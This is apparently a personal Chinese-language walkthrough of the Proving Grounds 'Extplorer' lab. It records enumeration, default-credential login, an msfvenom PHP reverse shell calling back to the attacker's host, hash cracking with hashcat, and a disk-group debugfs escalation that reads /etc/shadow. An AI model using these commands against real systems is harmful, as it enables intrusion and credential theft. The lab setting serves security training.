Difficuty

Midum

scans

[*] ssh found on tcp/22.
    OpenSSH 8.2p1


[*] http found on tcp/80.
    Apache/2.4.41 (Ubuntu)

80 wordpress

gobuster dir -w /usr/share//wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.212.16:80 -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.212.16:80
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share//wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.212.16/wp-content/]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.212.16/wordpress/]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.212.16/wp-includes/]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.212.16/wp-admin/]

wpscan 确认版本6.2，没扫描到插件

wpscan --url http://192.168.212.16 -v
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.212.16/ [192.168.212.16]
[+] Effective URL: http://192.168.212.16/wp-admin/setup-config.php
[+] Started: Sat Feb 15 23:15:32 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://192.168.212.16/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 6.2 identified (Insecure, released on 2023-03-29).
 | Found By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
 |  - http://192.168.212.16/wp-includes/css/dashicons.min.css?ver=6.2
 | Confirmed By:
 |  Common Wp Includes Query Parameter In Homepage (Passive Detection)
 |   - http://192.168.212.16/wp-includes/css/buttons.min.css?ver=6.2
 |  Style Etag (Aggressive Detection)
 |   - http://192.168.212.16/wp-admin/load-styles.php, Match: '6.2'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:08 <=================================================================> (137 / 137) 100.00% Time: 00:00:08

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Feb 15 23:16:51 2025
[+] Requests Done: 169
[+] Cached Requests: 5
[+] Data Sent: 35.328 KB
[+] Data Received: 42.482 KB
[+] Memory used: 208.801 MB
[+] Elapsed time: 00:01:18

测试默认账号密码都没有结果

foodhold

gobuster扫到目录filemanager

gobuster dir -w /usr/share//wordlists/dirb/common.txt -u http://192.168.212.16:80 -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.212.16:80
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share//wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/filemanager          (Status: 301) [Size: 322] [--> http://192.168.212.16/filemanager/]
/index.php            (Status: 302) [Size: 0] [--> http://192.168.212.16:80/wp-admin/setup-config.php]
/server-status        (Status: 403) [Size: 279]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.212.16/wordpress/]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.212.16/wp-admin/]
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.212.16/wp-content/]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.212.16/wp-includes/]
/xmlrpc.php           (Status: 302) [Size: 0] [--> http://192.168.212.16:80/wp-admin/setup-config.php]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

使用admin:admin可以登录，并且有上传文件权限，msfvenom -p php/reverse_php LHOST=192.168.45.184 LPORT=4444 -f raw -o shell.php 生成webshell上传，curl ip:port/filemanager/shell.php 得到shell

rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.16] 57546
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
fwupd-refresh:x:113:117:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
dora:x:1000:1000::/home/dora:/bin/sh

cd /home/dora
ls
local.txt

cat local.txt

ls -al local.txt
-r-------- 1 dora dora 33 Feb 1602:29 local.txt

查看 etc/passwd发现有用户dora, 在dora主目录中有local.txt文件，但是www-data没有查看权限, 尝试在 /var/www/html搜索dora: grep dora * -r, 发现dora hash: $2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS

$ cd /var/www/html
$ grep dora * -r
filemanager/config/.htusers.php:        array('dora','$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS','/var/www/html','http://localhost','1','','0',1),
wp-includes/js/plupload/moxie.js:                    /(joli|[kxln]?ubuntu|debian|[open]*suse|gentoo|arch|slackware|fedora|mandriva|centos|pclinuxos|redhat|zenwalk|linpus)[\/\s-]?([\w\.-]+)*/i,
wp-includes/js/plupload/moxie.js:                                                                                        // Fedora/Mandriva/CentOS/PCLinuxOS/RedHat/Zenwalk/Linpus

hashcat 爆破密码得到 doraemon

hashcat -h |grep '$2a'
hashcat -h |grep '$2'
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System

hashcat -m 3200 dora.hash /usr/share/wordlists/rockyou.txt

ssh登录失败，只能通过密钥对方式登录

ssh dora@192.168.212.16
The authenticity of host '192.168.212.16 (192.168.212.16)' can't be established.
ED25519 key fingerprint is SHA256:VnMMoSlX8Y0MsU947B2bAEqDX+KmnqpFLFXtLgsOERw.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.212.16' (ED25519) to the list of known hosts.
dora@192.168.212.16: Permission denied (publickey).

但是在反弹的www-data的shell里，无法升级到交互式的shell, pyhthon, script, perl, socat都试过了，都不行，最后使用msf获取到shell可以正常切换用户

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.45.234 LPORT=4444 -f raw -o r.php生成msf反弹shell payload

use exploit/multi/fileformat/js_unpacker_eval_injection
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set Lhost tun0
Lhost => 192.168.45.234
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.45.234:4444
[*] Sending stage (39927 bytes) to 192.168.212.16
se[*] Meterpreter session 1 opened (192.168.45.234:4444 -> 192.168.212.16:37902) at 2025-02-16 12:47:41 +0800

meterpreter > shell
Process 34439 created.
Channel 0 created.
su dora
Password: doraemon
id
uid=1000(dora) gid=1000(dora) groups=1000(dora),6(disk)

escalation

diskgroup

1 2	id uid=1000(dora) gid=1000(dora) groups=1000(dora),6(disk)

dora用户有diskgroup权限 , 详见：Disk-group提权

首先查看/root挂在磁盘，/dev/mapper/ubuntu--vg-ubuntu--lv 挂在在 /目录，执行 debugfs /dev/mapper/ubuntu--vg-ubuntu--lv

发现无法写文件，无法实现通过写公钥然后通过ssh登录，在/root/.ssh下也没有公私钥，之后authorized_keys文件

读取/etc/shadow文件，得到root hash: $6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.

$ df -h
Filesystem                         Size  Used Avail Use% Mounted on
udev                               947M     0  947M   0% /dev
tmpfs                              199M  1.2M  198M   1% /run
/dev/mapper/ubuntu--vg-ubuntu--lv  9.8G  5.1G  4.3G  55% /
tmpfs                              992M     0  992M   0% /dev/shm
tmpfs                              5.0M     0  5.0M   0% /run/lock
tmpfs                              992M     0  992M   0% /sys/fs/cgroup
/dev/loop0                          62M   62M     0 100% /snap/core20/1611
/dev/loop2                          50M   50M     0 100% /snap/snapd/18596
/dev/loop1                          64M   64M     0 100% /snap/core20/1852
/dev/loop3                          92M   92M     0 100% /snap/lxd/24061
/dev/loop4                          68M   68M     0 100% /snap/lxd/22753
/dev/sda2                          1.7G  209M  1.4G  13% /boot
tmpfs                              199M     0  199M   0% /run/user/1000
$ debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
debugfs 1.45.5 (07-Jan-2020)
debugfs:  mkdir test
mkdir: Filesystem opened read/only
debugfs:  ls /root/.ssh
debugfs:  cd /root/.ssh
debugfs:  ls
authorized_keys

debugfs:  cat /etc/shadow
root:$6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.:19453:0:99999:7:::
daemon:*:19235:0:99999:7:::
bin:*:19235:0:99999:7:::
sys:*:19235:0:99999:7:::
sync:*:19235:0:99999:7:::
games:*:19235:0:99999:7:::
man:*:19235:0:99999:7:::
lp:*:19235:0:99999:7:::
mail:*:19235:0:99999:7:::
news:*:19235:0:99999:7:::
uucp:*:19235:0:99999:7:::
proxy:*:19235:0:99999:7:::
www-data:*:19235:0:99999:7:::
backup:*:19235:0:99999:7:::
list:*:19235:0:99999:7:::
irc:*:19235:0:99999:7:::
gnats:*:19235:0:99999:7:::
nobody:*:19235:0:99999:7:::
systemd-network:*:19235:0:99999:7:::
systemd-resolve:*:19235:0:99999:7:::
systemd-timesync:*:19235:0:99999:7:::
messagebus:*:19235:0:99999:7:::
syslog:*:19235:0:99999:7:::
_apt:*:19235:0:99999:7:::
tss:*:19235:0:99999:7:::
uuidd:*:19235:0:99999:7:::
tcpdump:*:19235:0:99999:7:::
landscape:*:19235:0:99999:7:::
pollinate:*:19235:0:99999:7:::
usbmux:*:19381:0:99999:7:::
sshd:*:19381:0:99999:7:::
systemd-coredump:!!:19381::::::
lxd:!:19381::::::
fwupd-refresh:*:19381:0:99999:7:::
dora:$6$PkzB/mtNayFM5eVp$b6LU19HBQaOqbTehc6/LEk8DC2NegpqftuDDAvOK20c6yf3dFo0esC0vOoNWHqvzF0aEb3jxk39sQ/S4vGoGm/:19453:0:99999:7:::

爆破得到密码 explorer

hashcat -h |grep '$6'
   1800 | sha512crypt $6$, SHA512 (Unix)                             | Operating System
  22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$)                      | Private Key

hashcat -m 1800 root.hash /usr/share/wordlists/rockyou.txt

反思

提权是看到了 dora 有权限 6(disk)，甚至linpeas中都有黄色背景的利用标识，为什么还是先给忽略了?

还是优先尝试自己熟悉的东西，要从最明显的开始

临渊羡鱼

Proving Grounds Practice - Extplorer